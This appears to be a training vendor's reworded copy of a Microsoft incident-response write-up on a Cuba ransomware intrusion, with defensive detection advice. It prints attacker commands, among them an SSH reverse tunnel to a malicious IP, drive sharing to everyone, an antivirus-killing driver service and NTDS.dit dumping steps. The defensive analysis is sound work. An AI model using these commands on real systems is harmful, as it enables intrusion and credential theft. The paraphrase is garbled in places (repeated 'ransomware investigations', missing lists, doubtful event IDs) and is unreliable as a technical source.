One of the most common threats to which the Microsoft Detection and Response Team (DART) now responds is ransomware investigations. As most network security postures improve, the groups responsible for these attacks continue to become more complex in their tactics, methods, and procedures (TTPs).
This blog post, discuss a recent ransomware investigations instance in which the attacker launched their malicious code utilizing a variety of common tools and methods, such as living-off-the-land binaries. After compromised accounts’ passwords were reset, Cobalt Strike was utilized to continue access to the network with NT AUTHORITY/SYSTEM (local SYSTEM) rights.
This thing shows how an attacker can stay on a network for a very long time before releasing ransomware investigations. They’ll go through the different methods used as well as the suggested defense and detection strategies that customers may take to better defend themselves against these kinds of attacks.
Due to the age of the attack, the short retention of security solutions, the reimage of encrypted devices before analysis, and other factors, DART was unable to identify the initial entry vector of this attack. The actor had domain administrator access when the activity was first discovered.
The DART team discovered multiple cases of scheduled activities and services being launched by the attack for persistence after they had acquired access to highly privileged credentials during their post-ransomware investigations analysis of this engagement. The malicious code of Services and Scheduled Tasks can operate with extremely privileged access by choosing to run as NT AUTHORITYSystem.
On servers, domain controllers, and admin workstations, Cobalt Strike was observed to spread throughout the network. To load the Cobalt Strike DLL by calling the “AllocConsole” exported function of a variant of the Termite family of malware, the attacker established Windows services that would execute rundll32 and persist their payload. These services can be seen to run using SYSTEM and domain administrator credentials together. Crimeware organizations usually use termite malware to load Cobalt Strike and avoid antivirus detection.
The Cobalt Strike DLLs had names based on the first and local octets of the command and control method, and they were located at C:\Windows\Temp (C2). A PowerShell script that copied the Cobalt Strike DLL to C:\Windows\Temp over SMB and then executed it through the installation of a remote service was used to spread the malware after the attacker had installed it on a domain controller.
Through the development of a service, the actor increased their permissions to “NT AUTHORITYSystem”. This service was probably created using Cobalt Strike and a pseudorandom service name, such as “4aedb00.”
To maintain persistence on important servers, such as domain controllers and domain administrator workstations, the actor installed OpenSSH on the client’s network. Instead of using the default OpenSSH path in System32, the actor installed OpenSSH under C:\Windows\OpenSSH.
As “NT AUTHORITY\System,” the attacker set up a scheduled operation to maintain an SSH connection to their C2. Instead of using TCP 22 as is usual for SSH transmission, the attacker used TCP 443. TCP 443 is usually open even if TCP 22 outbound may be prohibited in many enterprises because of its importance for online traffic. To enable the tunneling of malicious tools through the SSH connection, the attacker also enabled port forwarding on TCP 7878.
Additionally, the attacker was seen renaming ssh.exe to “C:\Windows\OpenSSH\svchost.exe” in an obvious attempt to avoid detection.
Four days after the ransomware was released, the attacker used their existing OpenSSH persistence to access the compromised network again and installed further persistent SSH services on additional domain controllers and domain administrator workstations.
To transmit files between their C2 and the compromised host, the attacker used the sftp-server in OpenSSH. On compromised hosts, the actor created SSH keys utilizing ssh-keygen.exe, a component of the OpenSSH toolbox. After the credentials had been reset, the attacker was able to SSH using the keys rather than the credentials.
For remote execution and discovery throughout the initial stages of the compromise, Impacket’s WMI modules were utilized. An open-source library of scripts for interacting with network protocols is called Impacket. Many crimeware organizations have recently used this toolbox for network investigation and lateral movement.
The attacker executed PowerShell scripts from “C:\Perflogs\” through Impacket, which created.txt files in the same path. Every command that is executed with Impacket outputs its findings to “\\127.0.0.1\ADMIN$\_1648051380.61”. After the PowerShell scripts and text files had been run, the attacker removed everything.
Before deploying Cobalt Strike on the device, the actor used Impacket to see if the destination server could hit the attacker’s C2.
PsExec.exe was used by the actor to disseminate the ransomware throughout the victims’ network. First, the attacker ran “open.bat,” which then ran “net share [C-Z]=[C-Z]:\ /grant:everyone,FULL.” Every drive on the host was shared, giving everyone access. The Cuba ransomware investigations comes in the forms “A.exe,” “Anet.exe,” and “Aus.exe.”
The main technique the attacker employed in this incident for the lateral movement was Remote Desktop Protocol (RDP), which allowed them to use a GUI environment to change system settings and install malware. The attacker had access to lateral movement and remote code execution using Impacket and PsExec. To RDP between devices, the attacker used domain administrator accounts.
Early in the compromise, the attacker used WDigest to cache credentials. The attacker was able to access domain administrator credentials as a result.
When turned on, the Windows function WDigest stores login information in clear text in its cache. Tools for gaining access to credentials, like Mimikatz, usually misuse this. The registry entry HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential will be set to 1 to determine whether WDigest has been enabled on your network. By setting the value to 0, this can be disabled.
The Active Directory database (NTDS.dit) was twice acquired by the attacker. In the first instance, five months into the compromise, the actor received the NTDS.dit. The attacker was able to access the NTDS.dit a second time four days after the ransomware investigations was deployed. By using the native application ntdsutil.exe and copying the.dit to “C:\Windows\Temp\data\audit\Active Directory\ntds.dit”, the attacker was able to produce a copy of the NTDS.dit.
The attacker created a volume shadow clone of a domain controller using “vssadmin,” which they then utilized to access the Active Directory database. By using this method, system files that a user normally wouldn’t be able to access are created in a static copy. The attacker copied the NTDS.dit, SYSTEM hive, and SECURITY hive to C:\Windows\ after creating the volume shadow copy so they could later remotely copy through the ADMIN$ share.
Before exfiltration, the attacker was seen compressing files with 7-Zip. The program 7z.exe was launched from C:\Windows\Temp. The attacker used the hostname of the device as the archive’s name without securing it with a password (for example: DC01.7z).
To remotely exfiltrate network shares to a C2 under the control of the attacker, the attacker used PuTTY Secure Copy (PSCP). In an attempt to appear as the absolute “lsas.exe” service, this version of PSCP had been renamed to “lsas.exe”. PSCP was run from the C:\Windows\Temp directory. The attacker specifically targeted people and financial resources.
After files had been quarantined by the antivirus, the attacker turned off Microsoft Defender Antivirus on some devices. While connected to the device through RDP, the attacker disabled Microsoft Defender Antivirus by using the Windows Security GUI tool.
The attacker used a driver for Avast anti-rootkit. In a recent blog post, Unit 42 described how Cuba ransomware investigations organizations have used this driver to disable antivirus software before the distribution of the ransomware.
Using the “sc” command, the actor installed the driver and made kernel-level rights available. The actor then entered “sc start aswSP-ArPot2” to start the service. The actor used this service to gain access to the kernel privileges necessary to disable the victims’ antivirus software. The victim network’s disabling of antivirus software made certain that the ransomware wouldn’t be contained or stopped from spreading.
Also, the attacker created harmless binaries to attack the driver’s weakness. Each executable name from a list of popular antivirus programs would be passed to the control code 0x9988C094 by these binaries, which would then ask the controller to end the processes.
It was noticed that the attacker was using standard system enumeration commands. Even though these instructions are benign, when they are combined, they can usually be used to detect an unauthorized user who is enumerating the system.
The following commands were seen being followed by the attacker:
Organizations must make sure they follow security procedures to protect their servers as we see more attacks using techniques similar to those in this blog. The suggestions for monitoring that businesses should use as part of their detection strategy are listed below.
Monitoring for unusual events should be done during service creation events. On administrator accounts that create services that run as System, a strong alert should be issued. It is possible to use this common privilege escalation approach in a number of ways, including via using the service.
It is important to keep an eye out for unusual executables or paths while creating new services. Drivers who are near those unusual paths should receive high-priority alerts. Even though the driver was duly signed, the position might indicate malicious use. Anomalous paths can take many forms, including but not limited to:
Microsoft recommends keeping an eye out for SSH installs and usage in your network that isn’t authorized. Running SSH as “NT AUTHORITY\System” is not recommended.
The actor used the following SSH command lines in this event. Observing similar activity in your environment is recommended:
ssh <organization>@<malicious IP address> -p 443 -i C:\ProgramData\ssh\id_ed25519 -R <malicious IP address>:10129:127.0.0.1:7878 -N -C -o IdentitiesOnly=yes -o StrictHostKeyChecking=no
Monitoring for the command on other process names may reveal process masquerading because the actor attempted to hide the SSH process as “svchost.exe”.
Microsoft recommends keeping an eye out for remote share access from the command prompt. The attacker usually applied this method to transfer files around the network.
When the command prompt makes a remote sharing request, Microsoft Defender for Endpoint will issue an alert. This also applies to Impacket statements that target the localhost ADMIN$ share. Your network’s monitoring of these warnings can help you identify unauthorized access.
Networks need to focus on PsExec usage. Detection methods that are suggested include:
Monitoring for each stage of PsExec can assist detect unauthorized versions within your network because the techniques used by PsExec are simple to replicate, either using off-the-shelf tools or through a custom, toolset using the Windows API. PsExec works in 3 stages:
Monitoring of executable files written to administrative shares can aid in finding lateral movement attempts. This can involve keeping an eye out for native command lines, such as copy, that target remote shares like the ones we mentioned earlier. DeviceFileEvents in Defender for Endpoint can be used to track file creation events sent through Server Message Block (SMB). The kernel process that controls SMB, ntoskrnl.exe, will produce the executable file, and the ShareName column will be set to ADMIN$.
Network administrators should pay attention to any unexpected remote connections to port 135 (RPC), which can be used by a process to remotely start and create services. Defender for Endpoint’s Advanced Hunting can help identify unusual connections on Port 135 by using the summary and sort operators. The KQL listed below can be used as a foundation for finding anomalous connections:
DeviceNetworkEvents | where RemotePort == 135 | summarize count() by InitiatingProcessFileName | sort by count_ asc
By using named pipes to create remote services, this method can also be duplicated. A remote actor can open the named pipe svcctl and connect to the IPC$ share to remotely launch a service. Similar detections would be present here, but the communication will go via port 445 to the IPC$ share.
The RPC connection will cause a service to be created at the destination end. Monitoring for unauthorized service creation by recording the 4679 events in the System event log.
By creating the named pipe on the target server, remote named pipe traffic can be monitored. The host device can connect to the specified pipe PSEXESVC created by PsExeSvc.exe via the IPC$ share. The ntoskrnl.exe process will connect to the specified pipe as a client because the host device connection is made through SMB.
Monitoring for any malicious uses of ntdsutil where actors can try to take the NTDS.dit. The command in the NTDS.dit dumping section illustrates how the actor duplicated the NTDS.dit using this tool. The only variable that will change throughout the execution of this command is the path, which may be observed. There aren’t many good reasons to make a complete NTDS.dit duplicate.
The defender for Endpoint sends alarms when the NTDS.dit is dumped, and these alerts need to be resolved immediately. Also strongly advised is the monitoring of “ntdsutil” usage that is not authorized.
Alerting on the creation of new.dit files can also assist in identifying potential NTDS.dit dumping if file monitoring is enabled on your network. A volume shadow copy of the NTDS.dit was seen being copied by the attacker.
In cases where antivirus has been turned off or tampered with, organizations should pay attention to and respond to antivirus and endpoint detection and response (EDR) alerts. Anti-tampering settings should be enabled whenever possible to stop actors from tampering with and turning off antivirus software.
Event logging is offered by Microsoft Defender Antivirus on product tampering attempts. This may entail turning off services like Real-Time Protection (Event ID: 5001). Additionally, an alert will be sent on the Defender for Endpoint portal, where users can further prioritize it using the advanced hunting interface. Additionally, monitoring for the use of the Windows PowerShell cmdlet might help in the detection of anti-virus tampering.
Through anomalous connections, DART was able to identify actor RDP connections. These unusual connections include the following:
Investigations of domain and enterprise administrator logons should look for unusual connections, such as those coming from edge servers or onto servers they don’t usually manage. Administrator accounts should be subject to multifactor authentication (MFA).
Through longer periods of hibernation before encryption, different kinds of persistent access, and the use of real certified binaries, ransomware investigations groups continue to become more effective. Some of these groups return to the network after encryption to make sure they keep a foothold on the network. These groups continue to target sensitive data for exfiltration.
Networks must continue to be on the lookout for these TTPs and unusual activity. The Cuba ransomware investigations organization used a wide range of survival methods to avoid being identified by antivirus software. This requires shifting the focus away from traditional malicious file detection and toward anomaly and behavioral detections for network hunting. Remote execution and access tools like PsExec and SSH should have their software audited regularly.
Microsoft recommends you concentrate on taking the following steps to improve the security of your network:
Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.
For more information, please get in touch with one of our course advisers today or contact us at training@coursemonster.com